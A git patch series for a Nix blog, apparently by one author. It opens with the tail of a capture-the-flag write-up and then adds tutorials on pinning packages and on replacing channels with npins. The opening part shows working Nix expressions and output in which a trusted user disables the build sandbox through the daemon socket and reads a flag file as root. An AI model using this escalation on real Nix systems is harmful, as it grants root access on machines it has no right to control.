"https://github.com/nixos/nixpkgs/archive/6e2f00c83911461438301db0dba5281197fe4b3a.tar.gz"; + "sha256" = "sha256:0bsw31zhnnqadxh2i2fgj9568gqabni3m0pfib806nc2l7hzyr1h"; + }; + pkgs = import nixpkgs {}; + hax = pkgs.writeText "hax" (builtins.readFile ./stage2.nix); +in +pkgs.runCommand "meow" { buildInputs = [ pkgs.nixVersions.nix_2_13 ]; PKGS = pkgs.path; } '' + id -a + nix-build --option sandbox false --extra-experimental-features 'flakes nix-command' --store unix:///tmp/daemon ${hax} +'' +> EOF + +[user@nixos:~]$ cat >stage2.nix <<-'EOF' +> let + pkgs = import (builtins.getEnv "PKGS") { }; +in +pkgs.runCommand "meow2" { } '' + echo MEOW2 + id -a + ls / || true + ls /data || true + cat /data/* +'' +> EOF + +[user@nixos:~]$ nix-build stage1.nix +warning: Nix search path entry '/nix/var/nix/profiles/per-user/root/channels' does not exist, ignoring +these 2 derivations will be built: + /nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv + /nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv +these 11 paths will be fetched (3.92 MiB download, 23.41 MiB unpacked): + +building '/nix/store/gzniydj0mayvzs7hin3v3j1643fjzrq3-hax.drv'... +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/m4gjzvkjks5n1zr54cxjzmwav0g9zzj1-meow.drv'... +uid=1000(nixbld) gid=100(nixbld) groups=100(nixbld) +this derivation will be built: + /nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv +warning: Option 'accept-flake-config' is too dangerous, skipping. +warning: Option 'allow-new-privileges' is too dangerous, skipping. +warning: Option 'build-hook' is too dangerous, skipping. +warning: Option 'post-build-hook' is too dangerous, skipping. +warning: Option 'pre-build-hook' is too dangerous, skipping. +building '/nix/store/nv5j8z6w8zw0s6gjrmajy0wn7f2azfc0-meow2.drv'... +MEOW2 +uid=0(root) gid=0(root) groups=0(root) +bin dev home lib64 proc run sys usr +data etc lib nix root srv tmp var +flag +kalmar{0nlyReproduc1bleMisconfigurationsH3R3} +``` + +I was informed later that I found an unintended solution, and one was not +supposed to "simply set `sandbox = false`". The intended solution was to either +use the `diff-hook` setting which is run as the daemon's user (like +`post-build-hook` and `build-hook` which were conspicuously also banned), or +abuse being root to tamper with the inputs to the derivation and overwriting +something run by a privileged user. + +I don't think the unintended solution was that bad, though, because once you +are trusted user, it is assumed in the Nix codebase that you can just root the +box. From 20934137a63b77ece9d513dbf0ff752dd84c8572 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 8 Apr 2024 19:41:25 -0700 Subject: [PATCH 07/10] update flakes arent real --- content/posts/flakes-arent-real.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 01df387..5d0ceb3 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -454,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more sinister part, and the reason I would strongly recommend inline modules with closures instead of `specialArgs`: they break flake composition. +That being said, *either* using `specialArgs` *or* an inline module inside +`flake.nix`, rather than an option above, is the only way to inject module +imports. That is, if one uses some option like `imports = [ config.someOption +]`, it will cause an infinite recursion error. We would suggest putting the +imports inside an inline module inside `flake.nix` for this case. + To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`, which then land in the arguments of NixOS modules: From 1f33d774c2310081fc5e648881162df93143d8d4 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 8 Apr 2024 19:41:41 -0700 Subject: [PATCH 08/10] draft --- content/posts/pinning-packages-in-nix.md | 152 +++++++++++++++++++++++ 1 file changed, 152 insertions(+) create mode 100644 content/posts/pinning-packages-in-nix.md diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md new file mode 100644 index 0000000..eca3419 --- /dev/null +++ b/content/posts/pinning-packages-in-nix.md @@ -0,0 +1,152 @@ ++++ +date = "2024-04-02" +draft = true +path = "/blog/pinning-packages-in-nix" +tags = ["nix"] +title = "Pinning packages in Nix" ++++ + +Although Nix supposedly makes pinning things easy, it really does not seem so: +it is not possible to simply write `package = "^5.0.1"` in some file somewhere +and get *one* package pinned at a specific version. Though this is frustrating, +there is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and is unlike a standard language package manager. + +This post will go through the ways to pin a package to some older version and +why one would use each method. + +## FIXME +mention that these methods can generally be overlayed. mention that overlaying +*across different nixpkgs* is probably a bad idea + +# Simply add an older version of nixpkgs + +> Software regressed? No patches in master to fix it? Try 30-40 different + versions of nixpkgs. An easy weeknight bug fix. You will certainly not regret + pinning 30-40 versions of nixpkgs. + +Unlike most systems, it is fine to mix versions of nixpkgs, although it will +likely go wrong if, e.g. libraries are intermingled between versions. But, if +one package is all that is necessary, one can in fact simply import another +version of nixpkgs. + +This works because binaries from multiple versions of nixpkgs can coexist +on a computer and simply work. However, it can go wrong if they are loading +libraries at runtime, especially if the glibc version changes, especially if +`LD_LIBRARY_PATH` is involved. That failure mode is, however, rather loud and +obvious if it happens. + +For example: + +```nix +let + pkgs1Src = builtins.fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-23.11 + url = "https://github.com/nixos/nixpkgs/archive/219951b495fc2eac67b1456824cc1ec1fd2ee659.tar.gz"; + sha256 = "sha256-u1dfs0ASQIEr1icTVrsKwg2xToIpn7ZXxW3RHfHxshg="; + name = "source"; + }; + + pkgs2Src = fetchTarball { + # https://github.com/nixos/nixpkgs/tree/nixos-unstable + url = "https://github.com/nixos/nixpkgs/archive/d8fe5e6c92d0d190646fb9f1056741a229980089.tar.gz"; + sha256 = "sha256-iMUFArF0WCatKK6RzfUJknjem0H9m4KgorO/p3Dopkk="; + name = "source"; + }; + + pkgs1 = import pkgs1Src { }; + pkgs2 = import pkgs2Src { }; + +in +{ + env = pkgs1.buildEnv { + name = "env"; + paths = [ pkgs1.vim pkgs2.hello ]; + }; + + vim1 = pkgs1.vim; + vim2 = pkgs2.vim; +} +``` + +Here we have an environment which is being built out of packages from two +different versions of nixpkgs, so that `result/bin/hello` is from `pkgs2` and +`result/bin/vim` is from `pkgs1`. This can equivalently be done for +`environment.systemPackages` or similar such things: to get another version of +nixpkgs into a NixOS configuration, one can: + +- For flakes, one can inject the dependency [in some manner suggested by + "Flakes aren't real"][flakes-arent-real]. Or, one can do the + `builtins.fetchTarball` thing above. +- For non-flakes, one can do the `builtins.fetchTarball` thing shown above, or + add another input in [`npins`][npins]/Niv/etc, or add a second channel + (though we suggest migrating NixOS configs using channels to npins or + flakes so that the nixpkgs version is tracked in git). + +[flakes-arent-real]: https://jade.fyi/blog/flakes-arent-real/ +[npins]: https://github.com/andir/npins + +``` + » nix-build -A env /tmp/meow.nix +/nix/store/zilav8lqqgfgrk54wg88mdwq582hqdp9-env + +~ » ./result/bin/hello --version | head -n1 +hello (GNU Hello) 2.12.1 + + » ./result/bin/vim --version | head -n3 +VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Jan 01 1980 00:00:00) +Included patches: 1-2116 +Compiled by nixbld + + » nix eval -f /tmp/meow.nix vim1.version +"9.0.2116" + + » nix eval -f /tmp/meow.nix vim2.version +"9.1.0148" +``` + +
+
Difficulty
+
Very easy
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Vendor the package + +Another way to pin one package is to vendor the package definition of the +relevant version. The easiest way to do this is to find the version of nixpkgs +with the desired package version and then copy the `package.nix` or +`default.nix` or such into your own project, and then call it with +`callPackage`. + +
+
Difficulty
+
Slight effort
+
Rebuilds
+
+None, but will bring in another copy of nixpkgs and any dependencies (and +transitive dependencies). +
+
+ +# Patch the package with overrides + +maybe explain what .override does + +## Limitations + +go and rust bustedness +link to the architecture issue + +# Patch a NixOS module + +disable modules thing + +# Patch the base system without a world rebuild + +xz etc + From 4d833234518bd2296f23c84f85d057c7b41ce75e Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Sun, 19 May 2024 19:10:35 -0700 Subject: [PATCH 09/10] pinning nix things --- content/posts/pinning-packages-in-nix.md | 200 ++++++++++++++++++++--- 1 file changed, 179 insertions(+), 21 deletions(-) diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md index eca3419..05bef38 100644 --- a/content/posts/pinning-packages-in-nix.md +++ b/content/posts/pinning-packages-in-nix.md @@ -1,24 +1,21 @@ +++ -date = "2024-04-02" -draft = true +date = "2024-05-19" +draft = false path = "/blog/pinning-packages-in-nix" tags = ["nix"] title = "Pinning packages in Nix" +++ -Although Nix supposedly makes pinning things easy, it really does not seem so: -it is not possible to simply write `package = "^5.0.1"` in some file somewhere -and get *one* package pinned at a specific version. Though this is frustrating, -there is a reason for this, and it primarily speaks to how nixpkgs is a Linux -distribution and is unlike a standard language package manager. +Although Nix supposedly makes pinning things easy, it really does not seem so +from a perspective of looking at other software using pinning: it is not +possible to simply write `package = "^5.0.1"` in some file somewhere and get +*one* package pinned at a specific version. Though this is frustrating, there +is a reason for this, and it primarily speaks to how nixpkgs is a Linux +distribution and how Nix is unlike a standard language package manager. This post will go through the ways to pin a package to some older version and why one would use each method. -## FIXME -mention that these methods can generally be overlayed. mention that overlaying -*across different nixpkgs* is probably a bad idea - # Simply add an older version of nixpkgs > Software regressed? No patches in master to fix it? Try 30-40 different @@ -26,9 +23,11 @@ mention that these methods can generally be overlayed. mention that overlaying pinning 30-40 versions of nixpkgs. Unlike most systems, it is fine to mix versions of nixpkgs, although it will -likely go wrong if, e.g. libraries are intermingled between versions. But, if -one package is all that is necessary, one can in fact simply import another -version of nixpkgs. +likely go wrong if, e.g. libraries are intermingled between versions (*in +particular*, it is inadvisable to replace some program with a version +from a different nixpkgs from within an overlay for this reason). But, if one +package is all that is necessary, one can in fact simply import another version +of nixpkgs. This works because binaries from multiple versions of nixpkgs can coexist on a computer and simply work. However, it can go wrong if they are loading @@ -123,30 +122,189 @@ with the desired package version and then copy the `package.nix` or `default.nix` or such into your own project, and then call it with `callPackage`. +You can find it with something like: + +``` + » nix eval --raw -f '' hello.meta.position +/nix/store/0qd773b63yg8435w8hpm13zqz7iipcbs-source/pkgs/by-name/he/hello/package.nix:41 +``` + +Or, equivalently, with `nix repl -f ''`, `:e hello` or to do the same +as above, `hello.meta.position`. + +Then, vendor that file into your configurations repository. + +Once it is vendored, it can be used either from an overlay: + +```nix +final: prev: { + hello = final.callPackage ./hello-vendored.nix { }; +} +``` + +or directly in your use site: + +```nix +{ pkgs, ... }: { + environment.systemPackages = [ + (pkgs.callPackage ./vendored-hello.nix { }) + ]; +} +``` + +
Difficulty
Slight effort
Rebuilds
-None, but will bring in another copy of nixpkgs and any dependencies (and -transitive dependencies). +For the overlay use case, this will build the overridden package and anything +depending on it. For the direct at use site case, this will just rebuild the +package, and anything depending on it will get the version in upstream nixpkgs.
# Patch the package with overrides -maybe explain what .override does +nixpkgs offers several separate methods to "override" things that mean +different things. In short: + +- [`somePackage.override`][override] replaces the dependencies of a package; + more specifically the dependencies injected by `callPackage`. It accepts an + attribute set but can also accept a lambda of one argument, providing the + previous dependencies of the package. +- [`somePackage.overrideAttrs`][overrideAttrs] replaces the `stdenv.mkDerivation` + arguments of a package. This lets you replace the `src` of a package, in + principle. +- [`overrideCabal`][overrideCabal] replaces the `haskellPackages.mkDerivation` + arguments for a Haskell package in a similar way that `overrideAttrs` does for + `stdenv.mkDerivation`. This is internally implemented by methods equivalent + to the evil crimes below. + +[override]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-override +[overrideAttrs]: https://nixos.org/manual/nixpkgs/stable/#sec-pkg-overrideAttrs +[overrideCabal]: https://nixos.org/manual/nixpkgs/stable/#haskell-overriding-haskell-packages + +Here are some examples: + +Build an openttd with a different upstream source by putting this in +`openttd-jgrpp.nix`: + +```nix +{ openttd, fetchFromGitHub }: +openttd.overrideAttrs (old: { + src = fetchFromGitHub { + owner = "jgrennison"; + repo = "openttd-patches"; + rev = "jgrpp-0.57.1"; + sha256 = "sha256-mQy+QdhEXoM9wIWvSkMgRVBXJO1ugXWS3lduccez1PQ="; + }; +}) +``` + +then `pkgs.callPackage ./openttd-jgrpp.nix { }`. + +For instance, the following (rather silly) command will build such a file: + +``` + » nix build -L --impure --expr 'with import {}; callPackage ./openttd-jgrpp.nix {}' +``` ## Limitations -go and rust bustedness -link to the architecture issue +Most notably, [overrideAttrs doesn't work][overrideAttrs-busted] on several +significant language ecosystems including Rust and Go, since one almost always +needs to override the arguments of `buildRustPackage` or `buildGoPackage` when +replacing something. For these, either one can do crimes to introduce an +`overrideRust` function (see below), or one can cry briefly and then vendor the +package. The latter is easier. + +```nix +let + pkgs = import { }; + # Give the package a fake buildRustPackage from callPackage that modifies the + # arguments through a function. + overrideRust = f: drv: drv.override (oldArgs: + let rustPlatform = oldArgs.rustPlatform or pkgs.rustPlatform; + in oldArgs // { + rustPlatform = rustPlatform // { + buildRustPackage = args: rustPlatform.buildRustPackage (f args); + }; + }); + + # Take some arguments to buildRustPackage and make new ones. In this case, + # override the version and the hash + evil = oldArgs: oldArgs // { + src = oldArgs.src.override { + rev = "v0.20.9"; + sha256 = "sha256-NxWqpMNwu5Ajffw1E2q9KS4TgkCH6M+ctFyi9Jp0tqQ="; + }; + version = "master"; + # FIXME: if you are actually doing this put a real hash here + cargoSha256 = pkgs.lib.fakeHash; + }; + +in +{ + x = overrideRust evil pkgs.tree-sitter; +} +``` + +[overrideAttrs-busted]: https://github.com/NixOS/nixpkgs/issues/99100 + +Then: `nix build -L -f evil.nix x` + +
+
Difficulty
+
Highly variable, sometimes trivial, sometimes nearly impossible, depending +on architectural flaws of nixpkgs.
+
Rebuilds
+
+For the overlay use case of actually using this overridden package, this will +build the overridden package and anything depending on it. For the direct at +use site case, this will just rebuild the package, and anything depending on it +will get the version in upstream nixpkgs. +
+
# Patch a NixOS module -disable modules thing +If one wants to replace a NixOS module, say, by getting it from a later version +of nixpkgs, see [Replacing Modules] in the NixOS manual. + +[Replacing Modules]: https://nixos.org/manual/nixos/stable/#sec-replace-modules # Patch the base system without a world rebuild -xz etc +It's possible to replace an entire store path with another inside a NixOS +system without rebuilding the world (but wasting some space (by duplicating +things for the rewritten version) and being somewhat evil/potentially unsound +since it is just a text replacement of the hashes). This can be achieved with +the NixOS option +[`system.replaceRuntimeDependencies`][replaceRuntimeDependencies]. + +[replaceRuntimeDependencies]: https://nixos.org/manual/nixos/stable/options#opt-system.replaceRuntimeDependencies + +# Why do we need all of this? + +The primary reason that Nix doesn't allow trivially overriding packages with a +different version is that it is a generalized build system building software +that has non-uniform expectations of how to be built. One can in indeed see +that the "replace one version with some other in some file" idea is *almost* +reality in languages using `mkDerivation` directly, though one might have to +tweak other build properties sometimes. Architectural problems in nixpkgs +prevent this working for several ecosystems. + +Another sort of issue is that nixpkgs tries to provide a mostly [globally +coherent] set of software versions, where, like most Linux distributions, there +is generally one blessed version of a library with some exceptions. This is, in +fact, mandatory to be able to have any cache hits as a hermetic build system: +if everyone was building slightly different versions of libraries, all +downstream packages will have different hashes and thus miss the cache. + +So, in a way, a software distribution based on Nix cannot have separate locking +for every package and simultaneously have functional caches: the moment that +everything is not built together, caches will miss. + +[globally coherent]: https://www.haskellforall.com/2022/05/the-golden-rule-of-software.html From 07074b5345b863bf3b157cbc782de531359a4d21 Mon Sep 17 00:00:00 2001 From: Jade Lovelace Date: Mon, 20 May 2024 13:42:40 -0700 Subject: [PATCH 10/10] Pinning nixos with npins --- content/posts/pinning-nixos-with-npins.md | 368 ++++++++++++++++++++++ content/posts/pinning-packages-in-nix.md | 6 +- 2 files changed, 371 insertions(+), 3 deletions(-) create mode 100644 content/posts/pinning-nixos-with-npins.md diff --git a/content/posts/pinning-nixos-with-npins.md b/content/posts/pinning-nixos-with-npins.md new file mode 100644 index 0000000..82f8537 --- /dev/null +++ b/content/posts/pinning-nixos-with-npins.md @@ -0,0 +1,368 @@ ++++ +date = "2024-05-20" +draft = false +path = "/blog/pinning-nixos-with-npins" +tags = ["nix"] +title = "Pinning NixOS with npins, or how to kill channels forever without flakes" ++++ + +> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"
+> 6 hours later: Utterly bamboozled by channels
+> 6.5 hours later: I am no longer using channels + +\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776) + +Nix channels, which, just like Nix, is a name overloaded to mean several +things, are an excellent way to confuse and baffle yourself with a NixOS +configuration by making it depend on uncontrolled and confusing external +variables rather than being self-contained. You can see [an excellent +explanation of the overloaded meanings of "channels" at samueldr's +blog][samueldr-channels]. In this post I am using "channels" to refer to the +`nix-channel` command that many people to manage what `` points to, +and thus control system updates. + +[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html + +It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad +shell script; you can [read the sources here][nixos-rebuild]. I would even go +so far as to argue that it's a bad shell script that is a primary contributor +to flakes gaining prominence, since its UX on flakes is so much better: flakes +don't have the `/etc/nixos` permissions problems *or* the pains around pinning +that exist in the default non-flakes `nixos-rebuild` experience. We rather owe +it to our users to produce a better build tool, though, because `nixos-rebuild` +is *awful*, and there are currently the beginnings of efforts in that direction +by people including samueldr; `colmena` is also an example of a better build +tool. + +Both the permissions issue and the pinning are extremely solvable problems +though, which is the subject of this post. [Flakes have their +flaws][samueldr-flakes] and, more to the point, plenty of people just don't +want to learn them yet, and nobody has yet met people where they are at with +respect to making this simplification *without* doing it with flakes. + +This is ok! Let's use something more understandable that does the pinning part +of flakes and not worry about the other parts. + +[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html + +This blog post teaches you how to move your NixOS configuration into a repo +wherever you want, and eliminate `nix-channel` altogether, instead pinning the +version of `` and NixOS in a file in your repo next to your config. + +[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh + +# Background: what NixOS builds actually do + +First, let's say how NixOS builds actually work, skipping over all the remote +build stuff that `nixos-rebuild` also does. + +For non-flakes, `` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in +``. This resolves the `NIX_PATH` entry `` as the first +user-provided NixOS module to evaluate, or alternatively +`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations, +substitute `yourflake#nixosConfigurations.NAME` in your head in place of +``. + +[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix + +The default `NIX_PATH` is the following: + +``` +nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels +``` + +That is to say, unless it's been changed, `` will reference root's +channels, managed with `nix-channel`. + +Next, the attribute `config.nix.package` of `` is evaluated then +built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or +`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is +likewise evaluated and the `nixos-rebuild` is re-executed into the one from the +future configuration instead of the one from the current configuration, unless +`--fast` is passed. + +Once your configuration has been evaluated once or twice pointlessly, it is +evaluated a third time, for the attribute `config.system.build.toplevel`, and +that is built to yield the new system generation. + +This derivation is what becomes `/run/current-system`: it contains a bunch of +symlinks to everything that forms that generation such as the kernel, initrd, +`etc` and `sw` (which is the NixOS equivalent of `/usr`). + +Finally, `the-build-result/bin/switch-to-configuration` is invoked with an +argument `switch`, `dry-activate`, or similar. + +--- + +From this information, one could pretty much write a NixOS build tool: it really is +just `nix build -f '' config.system.build.toplevel` (in old +syntax, `nix-build '' -A config.system.build.toplevel`), then +`result/bin/switch-to-configuration`. That's all it does. + +# Background: what is npins anyway? + +[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning +tool many people used before switching to flakes. But what is a pinning tool +for Nix anyway? It's just a tool that finds the latest commit of something, +downloads it, then stores that commit ID and the hash of the code in it in a +machine-readable lock file that you can check in. When evaluating your Nix +expressions, they can use `builtins.fetchTarball` to obtain that exact same +code every time. + +That is to say, a pinning tool lets you avoid having to copy paste Git commit +IDs around, and ultimately does something like this in the end, which hands you +a path in the Nix store with the code at that version. + +```nix +builtins.fetchTarball { + # https://github.com/lix-project/lix/tree/main + url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz"; + sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU="; + name = "source"; +}; +``` + +Let's demystefy how pinning tools work by writing a trivial one in a couple of +lines of code. + +First, let's find the latest commit of nixos-unstable with `git ls-remote`: + +``` +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1 +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 +``` + +Then we can construct an archive URL for that commit ID, and fetch it into the +Nix store: + +``` +~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz +0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq +``` + +And finally fetch it from a Nix expression: + +``` +~ » nix repl +Lix 2.90.0-lixpre20240517-0d2cc81 +Type :? for help. +nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; } +nix-repl> nixpkgs +"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source" +``` + +This is essentially exactly what npins does, minus the part of saving the +commit ID and hash into `npins/sources.json`. + +We could write a simple shell script to do this, perhaps called +`./bad-npins.sh`: + +```bash +#!/usr/bin/env bash + +name=nixpkgs +repo=https://github.com/nixos/nixpkgs +branch=nixos-unstable + +tarballUrl="$repo/archive/$(git ls-remote "$repo" nixos-unstable | cut -f1)" +sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl") + +# initialize sources.json if not present +[[ ! -f sources.json ]] && echo '{}' > sources.json + +# use sponge from moreutils to deal with jq not having the buffering to safely +# do in-place updates +< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \ + '.[$name] = {sha256: $sha256, url: $url}' \ + | sponge sources.json +``` + +and then from Nix we can load the sources: + +```nix +let + srcs = builtins.fromJSON (builtins.readFile ./sources.json); + fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball { + name = "source"; + inherit sha256 url; + }; +in +builtins.mapAttrs fetchOne srcs +``` + +Result: + +``` +~ » nix eval -f sources.nix +{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; } +``` + +We now have a bad pinning tool! I wouldn't recommend using this shell script, since +it doesn't do things like check if redownloading the tarball is necessary, but +it is certainly cute and it does work. + +`npins` is pretty much this at its core, but well-executed. + +[npins]: https://github.com/andir/npins +[niv]: https://github.com/nmattia/niv + +# Fixing the UX issues + +We know that: + +1. `` as seen by `nixos-rebuild` determines what version of nixpkgs + is used to build the configuration. +2. Where the configuration is is simply determined by `` +3. Both instances of duplicate configuration evaluation are gated on `--fast` + not being passed. + +So, we just have to invoke `nixos-rebuild` with the right options and +`NIX_PATH` such that we get a config from the current directory with a +`nixpkgs` version determined by `npins`. + +Let's set up npins, then write a simple shell script. + +``` +$ npins init --bare +$ npins add --name nixpkgs channel nixos-unstable +``` + +You can also use `nixos-23.11` (or future versions once they come out) in place +of `nixos-unstable` here, if you want to use a stable nixpkgs. + +Time for a simple shell script. Note that this shell script uses `nix eval`, +which we at *Lix* are very unlikely to ever break in the future, but it does +require `--extra-experimental-features nix-command` as an argument if you don't +have the experimental feature enabled, or +`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The +experimental feature can be hacked around with +`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`, +which works around `nix-instantiate --eval` missing a `--raw` flag, but this is +kind of pointless since we are about to use flakes features in a second) + +```bash +#!/usr/bin/env bash + +cd $(dirname $0) + +# assume that if there are no args, you want to switch to the configuration +cmd=${1:-switch} +shift + +nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs) +nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix" + +# without --fast, nixos-rebuild will compile nix and use the compiled nix to +# evaluate the config, wasting several seconds +sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@" +``` + +# Killing channels + +Since building the config successfully, we can now kill channels to stop their +reign of terror, since we no longer need them to build the configuration at +all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove +CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos` +if you've moved your configuration to your home directory. + +Now we have a NixOS configuration built without using channels, but once we are +running that system, `` will still refer to a channel (or nothing, if +the channels are deleted), since we didn't do anything to `NIX_PATH` on the +running system. Also, the `nixpkgs` flake reference will point to the latest +`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`. +Let's fix both of these things. + +For context, *by default*, on NixOS 24.05 and later, due to [PR +254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS +configs get pinned `` and a pinned `nixpkgs` flake of the exact same +version as the running system, such that `nix-shell -p hello` and `nix run +nixpkgs#hello` give you the same `hello` every time: it will always be the same +one as if you put it in `systemPackages`. That setup works by setting +`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then +is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of +the current configuration. + +We can bring the same niceness to non-flake configurations, with the exact same +code behind it, even! + +Let's fix the `NIX_PATH`. Add this module worth of code into your config +somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`: + +```nix +{ config, pkgs, ... }: +let sources = import ./npins; +in { + # We need the flakes experimental feature to do the NIX_PATH thing cleanly + # below. Given that this is literally the default config for flake-based + # NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases + # will not get away with breaking it. + nix.settings = { + experimental-features = "nix-command flakes"; + }; + + # FIXME(24.05 or nixos-unstable): change following two rules to + # + # nixpkgs.flake.source = sources.nixpkgs; + # + # which does the exact same thing, using the same machinery as flake configs + # do as of 24.05. + nix.registry.nixpkgs.to = { + type = "path"; + path = sources.nixpkgs; + }; + nix.nixPath = ["nixpkgs=flake:nixpkgs"]; +} +``` + +# New workflow + +When you want to update NixOS, use `npins update`, then `./rebuild.sh` +(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch +on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes +from exactly one place now, and it is tracked along with the changes to your +configuration. Builds are faster now since we don't evaluate the configuration +multiple times. + +Multiple machines can no longer get desynchronized with each other. Config +commits *will* build to the same result in the future, since they are +self-contained now. + +# Conclusion and analysis + +We really need to improve `nixos-rebuild` as the NixOS development community. +It embodies, at basically every juncture, obsolescent practices that confuse +users and waste time. Modern configurations should be using either +npins/equivalent or flakes, both of which should be equally valid and easy to +use choices in all our tooling. + +Flags like `--no-rebuild-nix` come from an era where people were building +flake-based configs from a Nix that didn't even *have* flakes, so they needed +to be able to switch to an entirely different *Nix* to be able to evaluate +their config. We should never be rebuilding Nix by default before re-evaluating +the configuration in 2024. The Nix language is much, much more stable these +days, almost frozen like a delicious ice cream cone, and so the idea of +someone's config requiring a brand new Nix to merely evaluate is bordering on +absurd. + +It doesn't help that this old flakes hack actually breaks cross compiling +NixOS configs, for which `--fast` is thus mandatory. The re-execution of +`nixos-rebuild` is more excusable since there is [still work to do on that like +capturing output to the journal](https://github.com/NixOS/nixpkgs/pull/287968), +but it is still kind of bothersome to eat so much evaluation time about it; I +wonder if a happier medium is that it would just build `pkgs.nixos-rebuild` +instead of evaluating all the modules, but that has its own drawback of ignoring +overlays in the NixOS config... + +Another tool that [needs rewriting, documentedly +so](https://github.com/NixOS/nixpkgs/issues/293543) is `nixos-option`, which is +a bad pile of C++ that doesn't support flakes, and which could be altogether +replaced by a short bit of very normal Nix code and a shell script. + +There's a lot of work still to do on making NixOS and Nix a more friendly +toolset, and we hope you can join us. I (Jade) have been working along with +several friends on , a soon-to-be-released fork of CppNix +2.18 focused on friendliness, stability, and future evolution. People +in our community have been working on these UX problems outside Nix itself +as well. We would love for these tools to be better for everyone. diff --git a/content/posts/pinning-packages-in-nix.md b/content/posts/pinning-packages-in-nix.md index 05bef38..fa393d6 100644 --- a/content/posts/pinning-packages-in-nix.md +++ b/content/posts/pinning-packages-in-nix.md @@ -289,11 +289,11 @@ the NixOS option The primary reason that Nix doesn't allow trivially overriding packages with a different version is that it is a generalized build system building software -that has non-uniform expectations of how to be built. One can in indeed see +that has non-uniform expectations of how to be built. One can indeed see that the "replace one version with some other in some file" idea is *almost* -reality in languages using `mkDerivation` directly, though one might have to +reality in languages that use `mkDerivation` directly, though one might have to tweak other build properties sometimes. Architectural problems in nixpkgs -prevent this working for several ecosystems. +prevent this working for several ecosystems, though. Another sort of issue is that nixpkgs tries to provide a mostly [globally coherent] set of software versions, where, like most Linux distributions, there